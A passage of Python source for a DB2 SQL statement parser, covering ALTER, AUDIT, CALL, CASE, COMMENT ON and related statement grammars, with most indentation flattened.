if self._expect_one_of(['NODEGROUP', 'DATABASE']).value == 'DATABASE':
self._expect_sequence(['PARTITION', 'GROUP'])
self._expect(TT.IDENTIFIER)
elif self._match('NUMBLOCKPAGES'):
self._expect(TT.NUMBER)
if self._match('BLOCKSIZE'):
self._expect(TT.NUMBER)
elif self._match('BLOCKSIZE'):
self._expect(TT.NUMBER)
elif self._match('NOT'):
self._expect_sequence(['EXTENDED', 'STORAGE'])
elif self._match('EXTENDED'):
self._expect('STORAGE')
else:
self._match_one_of(['IMMEDIATE', 'DEFERRED'])
if self._match_one_of(['DBPARTITIONNUM', 'NODE']):
self._expect(TT.NUMBER)
self._expect('SIZE')
if self._match(TT.NUMBER):
self._match('AUTOMATIC')
else:
self._expect_one_of([TT.NUMBER, 'AUTOMATIC'])
def _parse_alter_database_statement(self):
"""Parses an ALTER DATABASE statement"""
# ALTER DATABASE already matched
if not self._match('ADD'):
self._expect(TT.IDENTIFIER)
self._expect('ADD')
self._expect_sequence(['STORAGE', 'ON'])
while True:
self._expect(TT.STRING)
if not self._match(','):
break
def _parse_alter_function_statement(self, specific):
"""Parses an ALTER FUNCTION statement"""
# ALTER [SPECIFIC] FUNCTION already matched
self._parse_function_name()
if not specific and self._match('(', prespace=False):
if not self._match(')'):
self._parse_datatype_list()
self._expect(')')
first = True
while True:
if self._match('EXTERNAL'):
self._expect('NAME')
self._expect_one_of([TT.STRING, TT.IDENTIFIER])
elif self._match('NOT'):
self._expect_one_of(['FENCED', 'THREADSAFE'])
elif self._match_one_of(['FENCED', 'THREADSAFE']):
pass
elif first:
self._expected_one_of([
'EXTERNAL',
'NOT',
'FENCED',
'THREADSAFE',
])
else:
break
first = False
def _parse_alter_partition_group_statement(self):
"""Parses an ALTER DATABASE PARTITION GROUP statement"""
# ALTER [DATABASE PARTITION GROUP|NODEGROUP] already matched
self._expect(TT.IDENTIFIER)
while True:
if self._match('ADD'):
self._parse_db_partition_list_clause(size=False)
if self._match('LIKE'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
elif self._match('WITHOUT'):
self._expect('TABLESPACES')
elif self._match('DROP'):
self._parse_db_partition_list_clause(size=False)
else:
self._expected_one_of(['ADD', 'DROP'])
if not self._match(','):
break
def _parse_alter_histogram_template_statement(self):
"""Parses an ALTER HISTOGRAM TEMPLATE statement"""
# ALTER HISTOGRAM TEMPLATE already matched
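        # e.g. ALTER HISTOGRAM TEMPLATE tmpl1 HIGH BIN VALUE 90000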
self._expect_sequence([TT.IDENTIFIER, 'HIGH', 'BIN', 'VALUE', TT.NUMBER])
def _parse_alter_module_statement(self):
"""Parses an ALTER MODULE statement"""
# ALTER MODULE already matched
self._parse_module_name()
if self._match_one_of(['ADD', 'PUBLISH']):
self._match_sequence(['OR', 'REPLACE'])
if self._match('CONDITION'):
self._expect(TT.IDENTIFIER)
if self._match('FOR'):
if self._match('SQLSTATE'):
self._match('VALUE')
self._expect(TT.STRING)
elif self._match('FUNCTION'):
self._parse_create_function_statement()
elif self._match('PROCEDURE'):
self._parse_create_procedure_statement()
elif self._match('TYPE'):
self._parse_create_type_statement()
elif self._match('VARIABLE'):
self._parse_create_variable_statement()
elif self._match('DROP'):
if not self._match('BODY'):
if self._match('CONDITION'):
self._expect(TT.IDENTIFIER)
elif self._match_one_of(['FUNCTION', 'PROCEDURE']):
self._parse_routine_name()
if self._match('(', prespace=False):
self._parse_datatype_list()
self._expect(')')
elif self._match('SPECIFIC'):
self._expect_one_of(['FUNCTION', 'PROCEDURE'])
self._parse_routine_name()
elif self._match('TYPE'):
self._parse_type_name()
elif self._match('VARIABLE'):
self._parse_variable_name()
else:
self._expected_one_of([
'BODY',
'CONDITION',
'FUNCTION',
'PROCEDURE',
'SPECIFIC',
'TYPE',
'VARIABLE',
])
else:
self._expected_one_of(['ADD', 'DROP', 'PUBLISH'])
def _parse_alter_nickname_statement(self):
"""Parses an ALTER NICKNAME statement"""
# ALTER NICKNAME already matched
self._parse_nickname_name()
if self._match('OPTIONS'):
self._parse_federated_options(alter=True)
while True:
if self._match('ADD'):
self._parse_table_constraint()
elif self._match('ALTER'):
if self._match('FOREIGN'):
self._expect('KEY')
self._parse_constraint_alteration()
elif self._match('CHECK'):
self._parse_constraint_alteration()
else:
# Ambiguity: A column can be called COLUMN
self._save_state()
try:
self._match('COLUMN')
self._parse_federated_column_alteration()
except ParseError:
self._restore_state()
self._parse_federated_column_alteration()
else:
self._forget_state()
elif self._match('DROP'):
if self._match('PRIMARY'):
self._expect('KEY')
elif self._match('FOREIGN'):
self._expect_sequence(['KEY', TT.IDENTIFIER])
elif self._match_one_of(['UNIQUE', 'CHECK', 'CONSTRAINT']):
self._expect(TT.IDENTIFIER)
else:
self._expected_one_of(['PRIMARY', 'FOREIGN', 'CHECK', 'CONSTRAINT'])
elif self._match_one_of(['ALLOW', 'DISALLOW']):
self._expect('CACHING')
else:
break
self._newline()
def _parse_alter_procedure_statement(self, specific):
"""Parses an ALTER PROCEDURE statement"""
# ALTER [SPECIFIC] PROCEDURE already matched
self._parse_procedure_name()
if not specific and self._match('(', prespace=False):
if not self._match(')'):
self._parse_datatype_list()
self._expect(')')
first = True
while True:
if self._match('EXTERNAL'):
if self._match('NAME'):
                    self._expect_one_of([TT.STRING, TT.IDENTIFIER])
elif self._match('ACTION'):
pass
else:
self._expected_one_of(['NAME', 'ACTION'])
elif self._match('NOT'):
self._expect_one_of(['FENCED', 'THREADSAFE'])
elif self._match_one_of(['FENCED', 'THREADSAFE']):
pass
elif self._match('NO'):
self._expect_sequence(['EXTERNAL', 'ACTION'])
elif self._match('NEW'):
self._expect_sequence(['SAVEPOINT', 'LEVEL'])
elif self._match('ALTER'):
self._expect_sequence(['PARAMETER', TT.IDENTIFIER, 'SET', 'DATA', 'TYPE'])
self._parse_datatype()
elif first:
self._expected_one_of([
'EXTERNAL',
'NOT',
'FENCED',
'NO',
                    'NEW',
'THREADSAFE',
'ALTER',
])
else:
break
first = False
def _parse_alter_security_label_component_statement(self):
"""Parses an ALTER SECURITY LABEL COMPONENT statement"""
# ALTER SECURITY LABEL COMPONENT already matched
        self._expect_sequence([TT.IDENTIFIER, 'ADD', 'ELEMENT', TT.STRING])
if self._match_one_of(['BEFORE', 'AFTER']):
self._expect(TT.STRING)
elif self._match('ROOT'):
pass
elif self._match('UNDER'):
self._expect(TT.STRING)
if self._match('OVER'):
while True:
self._expect(TT.STRING)
if not self._match(','):
break
self._expect('OVER')
def _parse_alter_security_policy_statement(self):
"""Parses an ALTER SECURITY POLICY statement"""
# ALTER SECURITY POLICY
self._expect(TT.IDENTIFIER)
while True:
if self._match('ADD'):
self._expect_sequence(['SECURITY', 'LABEL', 'COMPONENT', TT.IDENTIFIER])
elif self._match_one_of(['OVERRIDE', 'RESTRICT']):
self._expect_sequence(['NOT', 'AUTHORIZED', 'WRITE', 'SECURITY', 'LABEL'])
elif self._match_one_of(['USE', 'IGNORE']):
self._expect_one_of(['GROUP', 'ROLE'])
self._expect('AUTHORIZATIONS')
else:
break
def _parse_alter_sequence_statement(self):
"""Parses an ALTER SEQUENCE statement"""
# ALTER SEQUENCE already matched
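        # e.g. ALTER SEQUENCE seq1 RESTART WITH 1 (the option list itself is
        # handled by _parse_identity_options)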
self._parse_sequence_name()
self._parse_identity_options(alter='SEQUENCE')
def _parse_alter_server_statement(self):
"""Parses an ALTER SERVER statement"""
# ALTER SERVER already matched
self._parse_remote_server()
if self._match('OPTIONS'):
self._parse_federated_options(alter=True)
def _parse_alter_service_class_statement(self):
"""Parses an ALTER SERVICE CLASS statement"""
# ALTER SERVICE CLASS already matched
self._expect(TT.IDENTIFIER)
if self._match('UNDER'):
self._expect(TT.IDENTIFIER)
first = True
while True:
if self._match('AGENT'):
self._expect('PRIORITY')
self._expect_one_of(['DEFAULT', TT.NUMBER])
elif self._match('PREFETCH'):
self._expect('PRIORITY')
self._expect_one_of(['LOW', 'MEDIUM', 'HIGH', 'DEFAULT'])
elif self._match('OUTBOUND'):
self._expect('CORRELATOR')
self._expect_one_of(['NONE', TT.STRING])
elif self._match('COLLECT'):
if self._match('ACTIVITY'):
self._expect('DATA')
if self._match('ON'):
if self._match('ALL'):
self._match_sequence(['DATABASE', 'PARTITIONS'])
elif self._match('COORDINATOR'):
self._match_sequence(['DATABASE', 'PARTITION'])
else:
self._expected_one_of(['ALL', 'COORDINATOR'])
self._expect_one_of(['WITH', 'WITHOUT'])
self._expect('DETAILS')
self._match_sequence(['AND', 'VALUES'])
elif self._match('NONE'):
pass
else:
self._expected_one_of(['ON', 'NONE'])
elif self._match('AGGREGATE'):
if self._match('ACTIVITY'):
self._expect('DATA')
self._match_one_of(['BASE', 'EXTENDED', 'NONE'])
elif self._match('REQUEST'):
self._expect('DATA')
self._match_one_of(['BASE', 'NONE'])
else:
self._expected_one_of(['ACTIVITY', 'REQUEST'])
else:
self._expected_one_of(['ACTIVITY', 'AGGREGATE'])
elif self._match('ACTIVITY'):
self._expect_one_of(['LIFETIME', 'QUEUETIME', 'EXECUTETIME', 'ESTIMATEDCOST', 'INTERARRIVALTIME'])
self._expect_sequence(['HISTOGRAM', 'TEMPLATE', TT.IDENTIFIER])
elif self._match('REQUEST'):
self._expect_sequence(['EXECUTETIME', 'HISTOGRAM', 'TEMPLATE', TT.IDENTIFIER])
elif self._match_one_of(['ENABLE', 'DISABLE']):
pass
elif not first:
break
else:
self._expected_one_of([
'AGENT',
'PREFETCH',
'OUTBOUND',
'COLLECT',
'ACTIVITY',
'REQUEST',
'ENABLE',
'DISABLE'
])
def _parse_alter_table_statement(self):
"""Parses an ALTER TABLE statement"""
# ALTER TABLE already matched
self._parse_table_name()
self._indent()
while True:
if self._match('ADD'):
if self._match('RESTRICT'):
self._expect_sequence(['ON', 'DROP'])
elif self._match('PARTITION'):
# Ambiguity: optional partition name
self._save_state()
try:
self._match(TT.IDENTIFIER)
self._parse_partition_boundary()
except ParseError:
self._restore_state()
self._parse_partition_boundary()
else:
self._forget_state()
if self._match('IN'):
self._expect(TT.IDENTIFIER)
if self._match('LONG'):
self._expect('IN')
self._expect(TT.IDENTIFIER)
elif self._match('MATERIALIZED'):
self._expect('QUERY')
self._expect('(')
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
self._parse_refreshable_table_options(alter=True)
elif self._match('QUERY'):
self._expect('(')
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
self._parse_refreshable_table_options(alter=True)
elif self._match('('):
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
self._parse_refreshable_table_options(alter=True)
elif self._match('COLUMN'):
self._parse_column_definition()
elif self._match('SECURITY'):
self._expect('POLICY')
self._expect(TT.IDENTIFIER)
else:
self._save_state()
try:
# Try parsing a table constraint definition
self._parse_table_constraint()
except ParseError:
# If that fails, rewind and try and parse a column definition
self._restore_state()
self._parse_column_definition()
else:
self._forget_state()
elif self._match('ATTACH'):
self._expect('PARTITION')
# Ambiguity: optional partition name
self._save_state()
try:
self._match(TT.IDENTIFIER)
self._parse_partition_boundary()
except ParseError:
self._restore_state()
self._parse_partition_boundary()
else:
self._forget_state()
self._expect('FROM')
self._parse_table_name()
elif self._match('DETACH'):
self._expect_sequence(['PARTITION', TT.IDENTIFIER, 'FROM'])
self._parse_table_name()
elif self._match('ALTER'):
if self._match('FOREIGN'):
self._expect('KEY')
self._parse_constraint_alteration()
elif self._match('CHECK'):
self._parse_constraint_alteration()
else:
# Ambiguity: A column can be called COLUMN
self._save_state()
try:
self._match('COLUMN')
self._parse_column_alteration()
except ParseError:
self._restore_state()
self._parse_column_alteration()
else:
self._forget_state()
elif self._match('RENAME'):
self._match('COLUMN')
self._expect_sequence([TT.IDENTIFIER, 'TO', TT.IDENTIFIER])
elif self._match('DROP'):
if self._match('PRIMARY'):
self._expect('KEY')
elif self._match('FOREIGN'):
self._expect_sequence(['KEY', TT.IDENTIFIER])
elif self._match_one_of(['UNIQUE', 'CHECK', 'CONSTRAINT']):
self._expect(TT.IDENTIFIER)
elif self._match('COLUMN'):
self._expect(TT.IDENTIFIER)
self._match_one_of(['CASCADE', 'RESTRICT'])
elif self._match('RESTRICT'):
self._expect_sequence(['ON', 'DROP'])
elif self._match('DISTRIBUTION'):
pass
elif self._match('MATERIALIZED'):
self._expect('QUERY')
elif self._match('QUERY'):
pass
elif self._match('SECURITY'):
self._expect('POLICY')
else:
self._expect(TT.IDENTIFIER)
self._match_one_of(['CASCADE', 'RESTRICT'])
elif self._match('DATA'):
self._expect('CAPTURE')
if self._match('CHANGES'):
self._match_sequence(['INCLUDE', 'LONGVAR', 'COLUMNS'])
elif self._match('NONE'):
pass
else:
self._expected_one_of(['NONE', 'CHANGES'])
elif self._match('PCTFREE'):
self._expect(TT.NUMBER)
elif self._match('LOCKSIZE'):
self._expect_one_of(['ROW', 'BLOCKINSERT', 'TABLE'])
elif self._match('APPEND'):
self._expect_one_of(['ON', 'OFF'])
elif self._match('VOLATILE'):
self._match('CARDINALITY')
elif self._match('NOT'):
self._expect('VOLATILE')
self._match('CARDINALITY')
elif self._match('COMPRESS'):
self._expect_one_of(['YES', 'NO'])
elif self._match('ACTIVATE'):
if self._expect_one_of(['NOT', 'VALUE']).value == 'NOT':
self._expect_sequence(['LOGGED', 'INITIALLY'])
if self._match('WITH'):
self._expect_sequence(['EMPTY', 'TABLE'])
else:
self._expect('COMPRESSION')
elif self._match('DEACTIVATE'):
self._expect_sequence(['VALUE', 'COMPRESSION'])
else:
break
self._newline()
self._outdent()
def _parse_alter_tablespace_statement(self):
"""Parses an ALTER TABLESPACE statement"""
# ALTER TABLESPACE already matched
self._expect(TT.IDENTIFIER)
first = True
while True:
if self._match('ADD'):
if self._match('TO'):
self._expect_sequence(['STRIPE', 'SET', TT.IDENTIFIER])
self._parse_database_container_clause()
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
else:
# Ambiguity: could be a Database or a System container
# clause here
reraise = False
self._save_state()
try:
# Try a database clause first
self._parse_database_container_clause()
reraise = True
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
except ParseError:
# If that fails, rewind and try a system container
# clause
self._restore_state()
if reraise: raise
self._parse_system_container_clause()
self._parse_db_partition_list_clause(size=False)
else:
self._forget_state()
elif self._match('BEGIN'):
self._expect_sequence(['NEW', 'STRIPE', 'SET'])
self._parse_database_container_clause()
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
elif self._match('DROP'):
self._parse_database_container_clause(size=False)
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
elif self._match_one_of(['EXTEND', 'REDUCE']):
# Ambiguity: could be a Database or ALL containers clause
reraise = False
self._save_state()
try:
# Try an ALL containers clause first
self._expect_sequence(['(', 'ALL'])
reraise = True
self._match('CONTAINERS')
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M', 'G'])
self._expect(')')
except ParseError:
# If that fails, rewind and try a database container clause
self._restore_state()
if reraise: raise
self._parse_database_container_clause()
else:
self._forget_state()
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
elif self._match('PREFETCHSIZE'):
if not self._match('AUTOMATIC'):
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M', 'G'])
elif self._match('BUFFERPOOL'):
self._expect(TT.IDENTIFIER)
elif self._match('OVERHEAD'):
self._expect(TT.NUMBER)
elif self._match('TRANSFERRATE'):
self._expect(TT.NUMBER)
elif self._match('NO'):
self._expect_sequence(['FILE', 'SYSTEM', 'CACHING'])
elif self._match('FILE'):
self._expect_sequence(['SYSTEM', 'CACHING'])
elif self._match('DROPPED'):
self._expect_sequence(['TABLE', 'RECOVERY'])
self._expect_one_of(['ON', 'OFF'])
elif self._match('SWITCH'):
self._expect('ONLINE')
elif self._match('INCREASESIZE'):
self._expect(TT.NUMBER)
self._expect_one_of(['K', 'M', 'G', 'PERCENT'])
elif self._match('MAXSIZE'):
                if not self._match('NONE'):
self._expect(TT.NUMBER)
self._expect_one_of(['K', 'M', 'G'])
elif self._match('CONVERT'):
self._expect_sequence(['TO', 'LARGE'])
elif first:
self._expected_one_of([
'ADD',
'BEGIN',
                    'DROP',
'EXTEND',
'REDUCE',
'PREFETCHSIZE',
'BUFFERPOOL',
'OVERHEAD',
'TRANSFERRATE',
'NO',
'FILE',
'DROPPED',
'SWITCH',
'INCREASESIZE',
'MAXSIZE',
'CONVERT',
])
else:
break
first = False
def _parse_alter_threshold_statement(self):
"""Parses an ALTER THRESHOLD statement"""
# ALTER THRESHOLD already matched
self._expect(TT.IDENTIFIER)
while True:
if self._match('WHEN'):
self._parse_threshold_predicate()
self._parse_threshold_exceeded_actions()
elif not self._match_one_of(['ENABLE', 'DISABLE']):
break
def _parse_alter_trusted_context_statement(self):
"""Parses an ALTER TRUSTED CONTEXT statement"""
# ALTER TRUSTED CONTEXT already matched
self._expect(TT.IDENTIFIER)
first = True
while True:
if self._match('ADD'):
if self._match('ATTRIBUTES'):
self._expect('(')
while True:
self._expect_sequence(['ADDRESS', TT.STRING])
if self._match('WITH'):
self._expect_sequence(['ENCRYPTION', TT.STRING])
if not self._match(','):
break
self._expect(')')
elif self._match('USE'):
self._expect('FOR')
while True:
if not self._match('PUBLIC'):
self._expect(TT.IDENTIFIER)
self._match_sequence(['ROLE', TT.IDENTIFIER])
if self._match_one_of(['WITH', 'WITHOUT']):
self._expect('AUTHENTICATION')
if not self._match(','):
break
else:
self._expected_one_of(['ATTRIBUTES', 'USE'])
elif self._match('DROP'):
if self._match('ATTRIBUTES'):
self._expect('(')
while True:
self._expect_sequence(['ADDRESS', TT.STRING])
if not self._match(','):
break
self._expect(')')
elif self._match('USE'):
self._expect('FOR')
while True:
if not self._match('PUBLIC'):
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
else:
self._expected_one_of(['ATTRIBUTES', 'USE'])
elif self._match('ALTER'):
while True:
if self._match('SYSTEM'):
self._expect_sequence(['AUTHID', TT.IDENTIFIER])
elif self._match('ATTRIBUTES'):
self._expect('(')
while True:
self._expect_one_of(['ADDRESS', 'ENCRYPTION'])
self._expect(TT.STRING)
if not self._match(','):
break
self._expect(')')
elif self._match('NO'):
self._expect_sequence(['DEFAULT', 'ROLE'])
elif self._match('DEFAULT'):
self._expect_sequence(['ROLE', TT.IDENTIFIER])
elif not self._match_one_of(['ENABLE', 'DISABLE']):
break
elif self._match('REPLACE'):
self._expect_sequence(['USE', 'FOR'])
while True:
if not self._match('PUBLIC'):
self._expect(TT.IDENTIFIER)
self._match_sequence(['ROLE', TT.IDENTIFIER])
if self._match_one_of(['WITH', 'WITHOUT']):
self._expect('AUTHENTICATION')
if not self._match(','):
break
elif first:
self._expected_one_of(['ALTER', 'ADD', 'DROP', 'REPLACE'])
else:
break
first = False
def _parse_alter_user_mapping_statement(self):
"""Parses an ALTER USER MAPPING statement"""
# ALTER USER MAPPING already matched
        if not self._match('USER'):
            self._expect(TT.IDENTIFIER)
        self._expect_sequence(['SERVER', TT.IDENTIFIER, 'OPTIONS'])
        self._parse_federated_options(alter=True)
def _parse_alter_view_statement(self):
"""Parses an ALTER VIEW statement"""
# ALTER VIEW already matched
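        # e.g. ALTER VIEW v1 ENABLE QUERY OPTIMIZATION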
self._parse_view_name()
self._expect_one_of(['ENABLE', 'DISABLE'])
self._expect_sequence(['QUERY', 'OPTIMIZATION'])
def _parse_alter_work_action_set_statement(self):
"""Parses an ALTER WORK ACTION SET statement"""
# ALTER WORK ACTION SET already matched
self._expect(TT.IDENTIFIER)
first = True
while True:
if self._match('ADD'):
self._match_sequence(['WORK', 'ACTION'])
self._expect_sequence([TT.IDENTIFIER, 'ON', 'WORK', 'CLASS', TT.IDENTIFIER])
self._parse_action_types_clause()
self._parse_histogram_template_clause()
self._match_one_of(['ENABLE', 'DISABLE'])
elif self._match('ALTER'):
self._match_sequence(['WORK', 'ACTION'])
self._expect(TT.IDENTIFIER)
while True:
if self._match('SET'):
self._expect_sequence(['WORK', 'CLASS', TT.IDENTIFIER])
elif self._match('ACTIVITY'):
                    self._expect_one_of(['LIFETIME', 'QUEUETIME', 'EXECUTETIME', 'ESTIMATEDCOST', 'INTERARRIVALTIME'])
self._expect_sequence(['HISTOGRAM', 'TEMPLATE', TT.IDENTIFIER])
elif self._match_one_of(['ENABLE', 'DISABLE']):
pass
else:
# Ambiguity: could be the end of the loop, or an action
# types clause
self._save_state()
try:
self._parse_action_types_clause()
except ParseError:
self._restore_state()
break
else:
self._forget_state()
elif self._match('DROP'):
self._match_sequence(['WORK', 'ACTION'])
self._expect(TT.IDENTIFIER)
elif self._match_one_of(['ENABLE', 'DISABLE']):
pass
elif first:
self._expected_one_of(['ADD', 'ALTER', 'DROP', 'ENABLE', 'DISABLE'])
else:
break
first = False
def _parse_alter_work_class_set_statement(self):
"""Parses an ALTER WORK CLASS SET statement"""
# ALTER WORK CLASS SET already matched
self._expect(TT.IDENTIFIER)
outer = True
while True:
if self._match('ADD'):
self._match_sequence(['WORK', 'CLASS'])
self._expect(TT.IDENTIFIER)
self._parse_work_attributes()
self._expect('POSITION')
self._parse_position_clause()
elif self._match('ALTER'):
self._match_sequence(['WORK', 'CLASS'])
self._expect(TT.IDENTIFIER)
inner = True
while True:
if self._match('FOR'):
self._parse_for_from_to_clause(alter=True)
elif self._match('POSITION'):
self._parse_position_clause()
elif self._match('ROUTINES'):
self._parse_routines_in_schema_clause(alter=True)
elif inner:
self._expected_one_of(['FOR', 'POSITION', 'ROUTINES'])
else:
break
inner = False
elif self._match('DROP'):
self._match_sequence(['WORK', 'CLASS'])
self._expect(TT.IDENTIFIER)
elif outer:
self._expected_one_of(['ADD', 'ALTER', 'DROP'])
else:
break
outer = False
def _parse_alter_workload_statement(self):
"""Parses an ALTER WORKLOAD statement"""
self._expect(TT.IDENTIFIER)
first = True
while True:
if self._match('ADD'):
self._parse_connection_attributes()
elif self._match('DROP'):
self._parse_connection_attributes()
elif self._match_one_of(['ALLOW', 'DISALLOW']):
self._expect_sequence(['DB', 'ACCESS'])
elif self._match_one_of(['ENABLE', 'DISABLE']):
pass
elif self._match('SERVICE'):
self._expect_sequence(['CLASS', TT.IDENTIFIER])
if self._match('UNDER'):
self._expect(TT.IDENTIFIER)
elif self._match('POSITION'):
self._parse_position_clause()
elif self._match_sequence(['COLLECT', 'ACTIVITY', 'DATA']):
self._parse_collect_activity_data_clause(alter=True)
elif first:
self._expected_one_of([
'ADD',
'DROP',
'ALLOW',
'DISALLOW',
'ENABLE',
'DISABLE',
'SERVICE',
'POSITION',
'COLLECT'
])
else:
break
first = False
def _parse_alter_wrapper_statement(self):
"""Parses an ALTER WRAPPER statement"""
# ALTER WRAPPER already matched
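        # e.g. ALTER WRAPPER w1 OPTIONS (...); the option list is handled by
        # _parse_federated_options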
self._expect(TT.IDENTIFIER)
self._expect('OPTIONS')
self._parse_federated_options(alter=True)
def _parse_associate_locators_statement(self):
"""Parses an ASSOCIATE LOCATORS statement in a procedure"""
# ASSOCIATE already matched
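        # e.g. ASSOCIATE RESULT SET LOCATORS (loc1, loc2) WITH PROCEDURE p1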
self._match_sequence(['RESULT', 'SET'])
self._expect_one_of(['LOCATOR', 'LOCATORS'])
self._expect('(')
self._parse_ident_list()
self._expect(')')
self._expect_sequence(['WITH', 'PROCEDURE'])
self._parse_procedure_name()
def _parse_audit_statement(self):
"""Parses an AUDIT statement"""
# AUDIT already matched
while True:
if self._match_one_of([
'DATABASE',
'SYSADM',
'SYSCTRL',
'SYSMAINT',
'SYSMON',
'SECADM',
'DBADM',
]):
pass
elif self._match('TABLE'):
self._parse_table_name()
elif self._match_sequence(['TRUSTED', 'CONTEXT']):
self._expect(TT.IDENTIFIER)
elif self._match_one_of(['USER', 'GROUP', 'ROLE']):
self._expect(TT.IDENTIFIER)
else:
self._expected_one_of([
'DATABASE',
'SYSADM',
'SYSCTRL',
'SYSMAINT',
'SYSMON',
'SECADM',
'DBADM',
'TABLE',
'TRUSTED',
'USER',
'GROUP',
'ROLE',
])
if not self._match(','):
break
if self._match_one_of(['USING', 'REPLACE']):
self._expect_sequence(['POLICY', TT.IDENTIFIER])
elif not self._match_sequence(['REMOVE', 'POLICY']):
self._expected_one_of(['USING', 'REPLACE', 'REMOVE'])
def _parse_call_statement(self):
"""Parses a CALL statement"""
# CALL already matched
self._parse_subschema_name()
if self._match('(', prespace=False):
if not self._match(')'):
while True:
# Try and parse an optional parameter name
self._save_state()
try:
self._expect(TT.IDENTIFIER)
self._expect('=>')
except ParseError:
self._restore_state()
# Parse the parameter value
self._parse_expression()
if not self._match(','):
break
self._expect(')')
def _parse_case_statement(self):
"""Parses a CASE-conditional in a procedure"""
# CASE already matched
if self._match('WHEN'):
# Parse searched-case-statement
simple = False
self._indent(-1)
else:
# Parse simple-case-statement
self._parse_expression()
self._indent()
self._expect('WHEN')
simple = True
# Parse WHEN clauses (only difference is predicate/expression after
# WHEN)
t = None
while True:
if simple:
self._parse_expression()
else:
self._parse_search_condition()
self._expect('THEN')
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
t = self._match_one_of(['WHEN', 'ELSE', 'END'])
if t:
self._outdent(-1)
t = t.value
break
else:
self._newline()
if t != 'WHEN':
break
# Handle ELSE clause (common to both variations)
if t == 'ELSE':
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
if self._match('END'):
self._outdent(-1)
break
else:
self._newline()
self._outdent(-1)
self._expect('CASE')
def _parse_close_statement(self):
"""Parses a CLOSE cursor statement"""
# CLOSE already matched
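        # e.g. CLOSE c1 WITH RELEASE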
self._expect(TT.IDENTIFIER)
self._match_sequence(['WITH', 'RELEASE'])
def _parse_comment_statement(self):
"""Parses a COMMENT ON statement"""
# COMMENT ON already matched
# Ambiguity: table/view can be called TABLE, VIEW, ALIAS, etc.
reraise = False
self._save_state()
try:
# Try parsing an extended TABLE/VIEW comment first
self._parse_relation_name()
self._expect('(')
self._indent()
while True:
self._expect(TT.IDENTIFIER)
self._valign()
self._expect_sequence(['IS', TT.STRING])
reraise = True
if self._match(','):
self._newline()
else:
break
self._vapply()
self._outdent()
self._expect(')')
except ParseError:
# If that fails, rewind and parse a single-object comment
self._restore_state()
if reraise: raise
if self._match_one_of(['ALIAS', 'TABLE', 'NICKNAME', 'INDEX', 'TRIGGER', 'VARIABLE']):
self._parse_subschema_name()
elif self._match('TYPE'):
if self._match('MAPPING'):
self._expect(TT.IDENTIFIER)
else:
self._parse_subschema_name()
elif self._match('PACKAGE'):
self._parse_subschema_name()
self._match('VERSION')
# XXX Ambiguity: IDENTIFIER will match "IS" below. How to solve
# this? Only double-quoted identifiers are actually permitted
# here (or strings)
self._match_one_of([TT.IDENTIFIER, TT.STRING])
elif self._match_one_of(['DISTINCT', 'DATA']):
self._expect('TYPE')
self._parse_type_name()
elif self._match_one_of(['COLUMN', 'CONSTRAINT']):
self._parse_subrelation_name()
elif self._match_one_of(['SCHEMA', 'TABLESPACE', 'WRAPPER', 'WORKLOAD', 'NODEGROUP', 'ROLE', 'THRESHOLD']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['DATABASE', 'PARTITION', 'GROUP']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['AUDIT', 'POLICY']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['SECURITY', 'POLICY']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['SECURITY', 'LABEL']):
self._match('COMPONENT')
self._expect(TT.IDENTIFIER)
elif self._match('SERVER'):
if self._match('OPTION'):
self._expect_sequence([TT.IDENTIFIER, 'FOR'])
self._parse_remote_server()
else:
self._expect(TT.IDENTIFIER)
elif self._match('SERVICE'):
self._expect('CLASS')
self._expect(TT.IDENTIFIER)
self._match_sequence(['UNDER', TT.IDENTIFIER])
elif self._match_sequence(['TRUSTED', 'CONTEXT']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['HISTOGRAM', 'TEMPLATE']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['WORK', 'ACTION', 'SET']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['WORK', 'CLASS', 'SET']):
self._expect(TT.IDENTIFIER)
elif self._match('FUNCTION'):
if self._match('MAPPING'):
self._expect(TT.IDENTIFIER)
else:
self._parse_routine_name()
if self._match('(', prespace=False):
self._parse_datatype_list()
self._expect(')')
elif self._match('PROCEDURE'):
self._parse_routine_name()
if self._match('(', prespace=False):
self._parse_datatype_list()
self._expect(')')
elif self._match('SPECIFIC'):
self._expect_one_of(['FUNCTION', 'PROCEDURE'])
self._parse_routine_name()
else:
self._expected_one_of([
'ALIAS',
'AUDIT',
'COLUMN',
'CONSTRAINT',
'DATA',
'DATABASE',
'DISTINCT',
'FUNCTION',
'HISTOGRAM',
'INDEX',
'NICKNAME',
'PROCEDURE',
'ROLE',
'SCHEMA',
'SECURITY',
'SERVER',
'SERVICE',
'SPECIFIC',
'TABLE',
'TABLESPACE',
'THRESHOLD',
'TRIGGER',
'TRUSTED',
'TYPE',
'VARIABLE',
'WORK',
'WORKLOAD',
'WRAPPER',
])
self._expect_sequence(['IS', TT.STRING])
else:
self._forget_state()
def _parse_commit_statement(self):
"""Parses a COMMIT statement"""
# COMMIT already matched
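        # e.g. COMMIT WORK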
self._match('WORK')
def _parse_create_alias_statement(self):
"""Parses a CREATE ALIAS statement"""
# CREATE ALIAS already matched
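        # e.g. CREATE ALIAS staff FOR corp.employee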
self._parse_relation_name()
self._expect('FOR')
self._parse_relation_name()
def _parse_create_audit_policy_statement(self):
"""Parses a CREATE AUDIT POLICY statement"""
# CREATE AUDIT POLICY already matched
self._expect(TT.IDENTIFIER)
self._parse_audit_policy()
def _parse_create_bufferpool_statement(self):
"""Parses a CREATE BUFFERPOOL statement"""
# CREATE BUFFERPOOL already matched
